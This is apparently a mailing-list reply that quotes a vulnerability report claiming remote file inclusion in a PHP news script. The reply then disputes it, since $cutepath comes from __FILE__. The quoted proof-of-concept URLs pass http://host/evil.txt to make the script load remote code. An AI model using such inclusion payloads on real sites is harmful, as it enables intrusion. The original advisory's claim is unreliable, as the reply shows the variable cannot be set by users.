stormhacker@xxxxxxxxxxx wrote:
-----------------Description--------------- $cutepath = __FILE__; $cutepath = preg_replace( "'\\\search\.php'", "", $cutepath); $cutepath = preg_replace( "'/search\.php'", "", $cutepath); require_once("$cutepath/inc/functions.inc.php"); --------------PoC/Exploit---------------------- show_news.php?cutepath=http://host/evil.txt? search.php?cutepath=http://host/evil.txt?
$cutepath = __FILE__;$cutepath is set to script's working directory, so you can not set it manually.
--------------Solution--------------------- No Patch available.
As no needed? ;) Greets, satalin